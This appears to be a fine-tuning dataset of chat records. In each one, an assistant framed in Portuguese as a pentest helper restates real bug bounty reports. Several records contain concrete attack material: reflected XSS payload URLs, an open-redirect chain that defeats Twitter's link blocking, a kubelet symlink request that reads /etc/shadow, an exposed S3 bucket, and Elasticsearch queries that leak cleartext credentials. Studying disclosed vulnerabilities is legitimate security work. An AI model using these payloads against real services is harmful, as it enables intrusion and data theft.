AcronisSID.en=8a4d91ace2ecadca23dda91cdcb5abc5; AcronisUID.en=1438137573; _hjAbsoluteSessionInProgress=1; _uetsid=6d516b50174c11eb8ef2b18637bee740; _uetvid=b490e7509541648c67826dc18a0c7c46; _gat_UA-149943-47=1\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nServer: nginx\nDate: Mon, 26 Oct 2020 11:59:18 GMT\nContent-Type: application/json\nConnection: close\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\npragma: no-cache\nexpires: -1\nX-RateLimit-Limit: 100\nX-RateLimit-Remaining: 97\nAccess-Control-Allow-Origin: https://register.acronis.com\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, Cache-Control, Connection, DNT, Keep-Alive, If-Modified-Since, Origin, Save-Data, User-Agent, X-Requested-With, Content-Type\nAccess-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS\np3p: CP=IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nX-XSS-Protection: 1; mode=block\nContent-Length: 714\n```\nSee in response below,:\n```\nAccess-Control-Allow-Origin: https://register.acronis.com\nAccess-Control-Allow-Credentials: true\n```\nAccess-Control-Allow-Credentials are true for Access-Control-Allow-Origin as *.acronis.com which makes Credentials true for all subdomains of acronis.com. Cross-Origin Resource Sharing (CORS) allows cross-domain access from all subdomains of acronis.com\n\nTherefore, by taking over listed subdomains or finding any XSS vulnerability in any of the listed subdomains can steal user information or read arbitrary data from the accounts of other users. \n\nThe Subdomain takeover allows various attacks.\n\n Malware distribution\n Phishing / Spear phishing\n XSS\n Authentication bypass\n ...\n\nList goes on and on. Since some certificate authorities (Let's Encrypt) require only domain verification, SSL certificate can be easily generated.\nAn attacker can utilize these domains for targeting the organization by fake login forms, or steal sensitive information of teams (credentials, information, etc)\n\nFIX & MITIGATION\n**You should immediately remove the CNAME entries for these domains or point it elsewhere if you don't use marketo services.**\n\nPlease let me know if more info needed or any help.\n\nBest Regards,\nAshmek"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Attacker can generate cancelled transctions in a user's transaction history using only Steam ID"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe API endpoint `/create-payment` requires only the steam ID of the account to create the payment. When this endpoint is called using the `cardpay` flow, it returns a transaction ID on the Cardpay system. The attacker can access this transaction, and immediately cancel it (or pay it ;) ), which leads to a visible cancelled transaction in the cs.money user's transaction history.\n\nAlthough there is no impact to the user, they will certainly be confused.\n\n### Passos para Reproduzir\nInvoke the API call `/create-payment` as below:\n\n```\nPOST https://cs.money/create-payment HTTP/1.1\nHost: cs.money\nContent-Type: application/json;charset=UTF-8\nCookie: steamid=████████; \n\n{\"merchant\":\"cardpay\",\"amount\":10}\n```\n\nYou will get a response with a Cardpay order ID and URL:\n```\nHTTP/1.1 200 OK\n...\n{\"merchant\":\"cardpay\",\"orderId\":2034944,\"success\":true,\"url\":\"https://cardpay.com/MI/payment.html?uuid=DaG438Bda6GC13h5db1bGD01\"}\n```\n\nYou can then cancel the payment by hitting the Cardpay cancel URL:\n```\nhttps://cardpay.com/MI/cancel.html?uuid=DaG438Bda6GC13h5db1bGD01\n```\n\nThis will result in a cancelled transaction showing in the user's transaction history of the amount specified by the attacker. The attacker could repeat this numerous times until the account is banned by cs.money (this occurred on one of my test accounts).\n\n### Impacto\nConfusion for the user due to the ability to create many cancelled transactions, potentially leading to the account being banned."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [Information Disclosure] Amazon S3 Bucket of Shopify Ping (iOS) have public access of other users image"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Install Shopify Ping on your phone then enable Shopify Chat for your store.\n2. Go to your Shopify Store and start chatting as a customer. ███\n3. Log in to Staff account on Shopify Ping and click on send image ████████\n4. Back to Shopify Store as Customer and inspect the website code, you will find the URL of image ██████████ https://ping-api-production.s3.us-west-2.amazonaws.com/oks██████\n5. Now visit https://ping-api-production.s3.us-west-2.amazonaws.com, you can view all images of other stores. █████████\n\n### Impacto\nUsing this Bucket access, a hacker can steal all private images of other stores and the user who shared through Shopify Ping."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: password field autocomplete enabled"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\n[Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.\nThe stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.]\n\n### Passos para Reproduzir\n[follow the steps]\n\n 1. [signup with the new details]\n 1. [go to login page]\n 1. [there we will see password details are automatically filled]\n\n### Impacto\nThis autocomplete password can be sniffed without user permission"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Brave Browser potentially logs the last time a Tor window was used"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nA vulnerability in the Brave Browser allows an attacker to view the last time a Tor session was used in incognito mode. A local, on-disk attacker could read the Brave Browser's \"Local State\" json file and identify the last time a Tor session was used, affecting the confidentiality of a user's Tor session.\n\nFor example, the \"Local State\" file of a user who has recently used a Tor session would list a key value pair with a timestamp as accurate as \"13248493693576042\". This allows an attacker to fingerprint, or prove beyond reasonable doubt, that a user was using Tor at that very specific moment in time.\n\n### Passos para Reproduzir\nStart a Tor session in Brave Browser\n\n### Impacto\nViolate the confidentiality of a user's Tor session."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Default behavior of Fastifys versioned routes can be used for cache poisoning when Fastify is used in combination with a http cache / CDN"}, {"role": "assistant", "content": "### Passos para Reproduzir\nGiven the following Fastify server:\n\n```js\nconst app = require('fastify')();\n\napp.get('/', async () => {\n return { hello: 'world' };\n});\n\nconst start = async () => {\n await app.listen(9000)\n}\nstart();\n```\n\nRequesting this as follow:\n\n```sh\ncurl -v http://localhost:9000\n```\n\nit outputs a HTTP 200 with the expected content:\n\n```sh\n* Trying 127.0.0.1:9000...\n* TCP_NODELAY set\n* Connected to localhost (127.0.0.1) port 9000 (#0)\n> GET / HTTP/1.1\n> Host: localhost:9000\n> User-Agent: curl/7.68.0\n> Accept: */*\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< content-type: application/json; charset=utf-8\n< content-length: 17\n< Date: Tue, 03 Nov 2020 19:21:41 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n< \n* Connection #0 to host localhost left intact\n{\"hello\":\"world\"}\n```\n\nThough, if we request the same route with an `Accept-Version` header:\n\n```sh\ncurl -v -H \"Accept-version: tada\" http://localhost:9000\n```\n\nit outputs a HTTP 404:\n\n```sh\n* Trying 127.0.0.1:9000...\n* TCP_NODELAY set\n* Connected to localhost (127.0.0.1) port 9000 (#0)\n> GET / HTTP/1.1\n> Host: localhost:9000\n> User-Agent: curl/7.68.0\n> Accept: */*\n> Accept-version: tada\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 404 Not Found\n< content-type: application/json; charset=utf-8\n< content-length: 72\n< Date: Tue, 03 Nov 2020 19:25:09 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n< \n* Connection #0 to host localhost left intact\n{\"message\":\"Route GET:/ not found\",\"error\":\"Not Found\",\"statusCode\":404}\n```\n\nWhen a http cache / CDN are in front of such a server, an attacker can use this behavior to trigger caching of a 404 page on a legal route. Ex; A default Fastly (the CDN we use) or Varnish config will result in a cached 404 page with the above setup.\n\nWhen versioned routes are in use I also think that a `Vary` http header with `Accept-Version` as a value should be added to the response. That shall prevent a http cache / CDN from caching a 404 under the same cache key as a previous response.\n\nThough; to avoid this behavior when not using version routes I think it should be possible to turn off version routes. Is there an easy way to do so? Type a boolean on the constructor? Or do one need to write a custom version parser which according to doc affect performance?\n\nIts highly debatable if this is a security issue in Fastify, though, behavior of this might be worth having a second look at. Personally I was a bit surprised that versioned routes was a default behavior. I would expect it to be an opt in instead of opt out (if its possible to opt out).\n\n### Impacto\nAn attacker can use this cache poisoning to perform an attack where fully functionally URLs are replaced with 404's."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Exposed Configuration Files at https://www.exodus.io/keybase.txt"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nUsername, uid information is present in txt file.\n\n### Passos para Reproduzir\n1. Open This link https://www.exodus.io/keybase.txt \n 2. Search for username, uid\n 3. You will get some usernames with uid.\n\n### Impacto\nThis information may help attacker in further attacks."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS in https://███████ via hidden parameter \"████████\""}, {"role": "assistant", "content": "### Passos para Reproduzir\n- Use your favorite web browser\n- Go to : \n```\nhttps://███████/███████&███=TEST%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://█████████/█████████\n\nWith a little research, you can find a hidden parameter \"████████\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n### Impacto\nThe damages of a reflexive XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS on https://███/████via hidden parameter \"█████████\""}, {"role": "assistant", "content": "### Passos para Reproduzir\n- Use your favorite web browser\n- Go to : \n```\nhttps://█████/████████&██████=XXX%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%20here%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://██████/guest/tls_sso.php\n\nWith a little research, you can find a hidden parameter \"███\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n### Impacto\nThe damages of a reflected XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Read-only application can publish/delete fleets"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nTwitter released [Fleet](https://blog.twitter.com/ja_jp/topics/product/2020/ntroducing-fleets-new-way-to-join-the-conversation-jp.html) yesterday. This feature is working with few APIs, and these APIs are missing permission checks.\n\n### Passos para Reproduzir\n1. Install [twurl](https://github.com/twitter/twurl).\n 1. Authenticate as a read-only application.\n 1. Execute following command: `twurl /fleets/v1/create -X POST --header 'Content-Type: application/json' -d '{\"text\":\"Hey yo\"}'`\n 1. A fleet with `Hey yo` text will be created.\n\n### Impacto\nThe read-only application can publish fleets without getting Write permission. This issue has a similar impact to #434763"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Choose the target URL; let's take `https://ddosecrets.com` as an example.\n 2. Replace all occurrences of the ASCII period by the URL-encoded version of the [Ideographic Full Stop](https://unicode-table.com/en/3002/), i.e. `%E3%80%82`: `https://ddosecrets%E3%80%82com`.\n 3. URL-encode the result of step 2: `https%3A%2F%2Fddosecrets%25E3%2580%2582com`.\n 4. Append the result of step 3 to `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=` and append `%3F` to the result: `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=https%3A%2F%2Fddosecrets%25E3%2580%2582com%3F`.\n 5. URL-encode the result of step 4: `https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 6. Append the result of step 5 to `https://twitter.com/login?redirect_after_login=`: `https://twitter.com/login?redirect_after_login=https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 7. Log in to Twitter and tweet the URL resulting from step 6. Posting the tweet will succeed (but it shouldn't, if link validation were effective).\n 8. Click the malicious link in the tweet you just posted; you'll get redirected to the forbidden domain without being shown any Twitter interstitial page.\n\n(If you're not logged in to Twitter when you click the malicious link, you'll get prompted to log in, but you will still get redirected to the forbidden domain afterwards.)\n\n### Impacto\nAttackers can defeat [Twitter's approach to blocking links](https://help.twitter.com/en/safety-and-security/phishing-spam-and-malware-links) and post arbitrary unsafe links (starting with `https://twitter.com`, which really compounds the problem) in tweets."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Kubelet follows symlinks as root in /var/log from the /logs server endpoint"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nPrivilege escalation from a pod, to root read permissions on the entire filesytem of the node, by creating symlinks inside /var/log.\nThe kubelet is simply serving a fileserver at /var/log:\n\n_kubernetes\\pkg\\kubelet\\kubelet.go:1371_\n```golang\nif kl.logServer == nil {\n\t\tkl.logServer = http.StripPrefix(\"/logs/\", http.FileServer(http.Dir(\"/var/log/\")))\n\t}\n```\nThe kubelet naturally runs as root on the node, so this basically gives the ability for pods with write permissions to /var/log directory a directory traversal as a root user on the host (potentially taking over the whole cluster by getting secret keys)\nAn easy fix is checking the symlink destination, to figure out whether it is inside /var/lib/docker or other whitelisted paths to not break to mechanism of logs correlations\n\nA while back, I discovered this bug, when you didn't had the Bug Bounty program. \nI Published the following blog:\nhttps://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts\nDescribing the vulnerability.\n\n(it requires RBAC permissions to read logs, or a kubelet configured with AlwaysAllow. and a mount point to any child directory inside /var/log)\nI researched some log collectors projects in github, seems like alot of them are freely using this mount point.\nAs a user I would not imagine those projects can potentially take clusters.\n\n### Passos para Reproduzir\n1. create a pod with a mount path to `/var/log`\n 1. create a symlink in the mount point: `/var/log/rootfs_symlink -> /`\n 1. curl from within the pod: `https://:10250/logs/rootfs_symlink/etc/shadow`\n\n### Impacto\nRoot read permissions on the entire filesystem of the node"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: XSS in Email Input [intensedebate.com]"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI found an XSS in Email input. This input is not sanitized like other inputs allowing user to execute xss payloads.\n\n### Passos para Reproduzir\n1. Navigate to your account.\n2. In email address, add the below payload next to your email.\n`\">`\n\n### Impacto\nReflected XSS, An attacker can execute malicious javascript codes on the target application (email input specifically). It is highly recommended to fix this one because it is found in sensitive input (email).\n\nKind Regards."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Some build dependencies are downloaded over an insecure channel (without subsequent integrity checks)"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nBuild jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91) download dependencies from `build.openvpn.net` and `www.oberhumer.com`over an insecure channel (`http`, _not_ `https`) and do not check their integrity in any way.\n\nThis opens the door to person-in-the-middle attacks, whereby an attacker controlling an intermediate node on the network path between Travis CI's build servers and those two servers could manipulate traffic and inject his own malicious code into the artifacts produced by the two jobs in question.\n\n### Passos para Reproduzir\nThe `install` phase of the `.travis.yml` file [unconditionally executes](https://github.com/openvpn/openvpn/blob/master/.travis.yml#L120) the `.travis/build-deps.sh` script. If the following three conditions are satisfied,\n\n1. [the OS be other than `windows`](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L4),\n2. [environment variable `SSLLIB` be set to `openssl`](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L148), and\n3. [environment variable `CHOST` be set](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L161),\n\n(they are only satisfied for build jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91)), then shell functions `download_tap_windows` and `download_lzo` are executed [one](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L162) after the [other](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L165).\n\nShell functions `download_tap_windows` and `download_lzo` are defined above ([here](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L18) and [here](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L18), respectively) in `.travis/build-deps.sh`:\n\n```shell\ndownload_tap_windows () {\n if [ ! -f \"download-cache/tap-windows-${TAP_WINDOWS_VERSION}.zip\" ]; then\n wget -P download-cache/ \\\n \"http://build.openvpn.net/downloads/releases/tap-windows-${TAP_WINDOWS_VERSION}.zip\"\n fi\n}\n\ndownload_lzo () {\n if [ ! -f \"download-cache/lzo-${LZO_VERSION}.tar.gz\" ]; then\n wget -P download-cache/ \\\n \"http://www.oberhumer.com/opensource/lzo/download/lzo-${LZO_VERSION}.tar.gz\"\n fi\n}\n```\n\nNote that both `wget` commands use `http` as opposed to `https` ( though using `https` is readily possible, since both domains `build.openvpn.net` and `www.oberhumer.com` support `https` and have valid TLS certificates) .\n\n### Impacto\nThe two dependencies are downloaded over an insecure channel and, therefore, can be intercepted and tampered with by a person in the middle (controlling an intermediate node on the network path between Travis CI's build servers).\n\nMoreover, as no integrity checks seem to be performed after download, a person-in-the-middle attack would go undetected and could seriously compromise the integrity of the artifacts produced by those two build jobs.\n\nPlease do not dismiss the possibility of such an attack too quickly, as it is [not as far-fetched as one would think](https://medium.com/bugbountywriteup/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Email Verification bypass on signup"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThis bug is related to wordpress.com. There is feature in wordpress.com which allow users to invite people. We have to enter email address to invite that particular person but the invite link and invite key is also available to the person who invited. This allow attackers to create the profile without having access to the email address and they can make account on behalf of any people who is not already signed up in wordpress.com\n\n### Passos para Reproduzir\nThis issue can be reproduced by following these easy steps: \n* Login to your account on wordpress.com\n* Setup burpsuite proxy with browser.\n* Select your site and navigate to manage>people\n* Enter any email address which is not already registered in wordpress.com and invite\n* Open this url in browser: https://wordpress.com/people/invites/yoursite.wordpress.com [change yoursite.wordpress.com with your site]\n* See the burp suite proxy tab and find the GET request to this endpoint [https://public-api.wordpress.com/rest/v1.1/sites/siteId_here/invites?http_envelope=1&status=all&number=100] [there will be a number instead of siteId_here]\n* In response of this GET request you will see JSON which will be consisting of the details about the invitations sent and there you will find \"invite_key\" and \"link\".\n* Copy the link and open this in another browser.\n* You can create account on behalf of this email without having access to the email and email verification is bypassed :)\n\n**See the attached video for POC**\n\n### Impacto\nThis issue can be used to bypass email verification on signup. Attackers can create account on behalf on any person without having access to the email account. This issue is affecting integrity of the wordpress.com"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-8284: trusting FTP PASV responses"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe issue here arises from the fact that curl by default has the option CURLOPT_FTP_SKIP_PASV_IP disabled by default.\nAs a result, an attacker controlling the URL used by curl, can perform port scanning on behalf of the server where curl is running.\nThis can be achieved by setting up a custom FTP server that would setup the data channel through the PASV command using the port scanning target IP and port in the PASV connection info. \nOne good target for this issue are web applications vulnerable to SSRF.\n\n### Passos para Reproduzir\nSo we can differentiate between open, closed and filtered ports with the following:\n1. Open ports\ncurl will reply with TYPE after the PASV command\nexample:\nReceived: USER anonymous in 5\nReceived: PASS ftp@example.com in 5\nReceived: PWD in 5ms\nReceived: EPSV in 6ms\nReceived: PASV in 6ms\n**Received: TYPE I in 6ms**\nReceived: SIZE whatever in 5ms\nReceived: RETR whatever in 5ms\n\n2. Filtered\ncurl will timeout after the PASV command\nexample:\nReceived: USER anonymous in 6\nReceived: PASS ftp@example.com in 5\nReceived: PWD in 5ms\nReceived: EPSV in 6ms\nReceived: PASV in 5ms\nReceived: in **1011ms**\n\n3. Closed\ncurl will close the control channel connection immediately after PASV\nexample:\nReceived: USER anonymous in 6ms\nReceived: PASS ftp@example.com in 6ms\nReceived: PWD in 5ms\nReceived: EPSV in 5ms\nReceived: PASV in 5ms\nReceived: in **5ms**\n\nIn the attachments, I have included an ftp server (F1088885) that automates these steps.\nUsage:\n./ssrf_pasvaggresvftp.sh -t 127.0.0.1/31 -p 80,8000-8100 -x ./ftp_curl.sh -vv\n\nthe file included in the -x option is supposed to trigger the ssrf on the target server that would lead to the call of curl with the attacker's URL. In this case we simulate the issue by calling curl locally. The attachment F1088859 is the script used in the example.\n\n### Impacto\nThrough the port scanning, an attacker could uncover services running in the internal network.\nIt could also be possible to perform version enumeration or other information disclosure if the attacker can get back the results of curl.\nFor example, an attacker points curl at host:22 for the data channel . If an ssh server is running on that host, then it will reply with its version which is then disclosed to the attacker.\n\nUltimately, this issue can be used as a stepping stone to launch further attacks on the vulnerable server."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] XSS Reflected POST-Based"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello, i have found a XSS Reflected POST-Based in `https://www.intensedebate.com/ajax.php`.\n\nVulnerable(s) URL :\n\n```POST /https://www.intensedebate.com/ajax.php```\n\nVulnerable(s) Parameter(s):\n\n```\n$_POST['txt'];\n```\n\nPayload\n\n```\nazertyuiop<<>\n```\n\n### Impacto\nA attacker can perform a phishing attack or perform a CORS attack"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Permanent DoS at https://happy.tools/ when inviting a user"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Using separate browsers or browser containers, login to two different accounts. At least one account should have admin privileges in order to invite users.\n2. In the other account under the [preferences tab](https://schedule.happy.tools/preferences), notice the user email, change the email to ``boy_child@wearehackerone.com`` and save changes.\n3. In the admin account under the [users tab](https://schedule.happy.tools/admin/users), click on ``Invite team members`` and input the email ``boy_child@wearehackerone.com``.\n4. Scroll down and click on ``Send invite``.\n5. The request will fail.\n6. Repeat steps 2 to 4, but changing the email to that of other users (test accounts) and the request to send an invite link will continuously fail.\n\n### Impacto\nThrough user enumeration of emails and mass exploitation, there is a permanent denial of service denying a Happy Tools admin from adding team members to their organization."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS at https://www.glassdoor.com/ via the 'numSuggestions' parameter"}, {"role": "assistant", "content": "### Passos para Reproduzir\nGo to: `https://www.glassdoor.com/searchsuggest/typeahead?numSuggestions=8rk3s6%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60`\n{F1092213}\n\n### Impacto\nThe attacker can execute JS code."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Async search stores authorization headers in clear text"}, {"role": "assistant", "content": "### Passos para Reproduzir\n```\n# This just triggers an async-search as yourself.\nPOST /_async_search?size=0&wait_for_completion_timeout=0\n{\n \"query\": {\n \"match_all\": {}\n }\n}\n\n# This shows where the clear text authorization header is stored\nPOST /.async-search/_search\n{\n \"_source\": \"headers.*\"\n}\n```\n\n### Impacto\n- Super users can get the clear text credentials of other users.\n- An XSS with a superuser victim can now trivially get the authorization headers of its target."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança 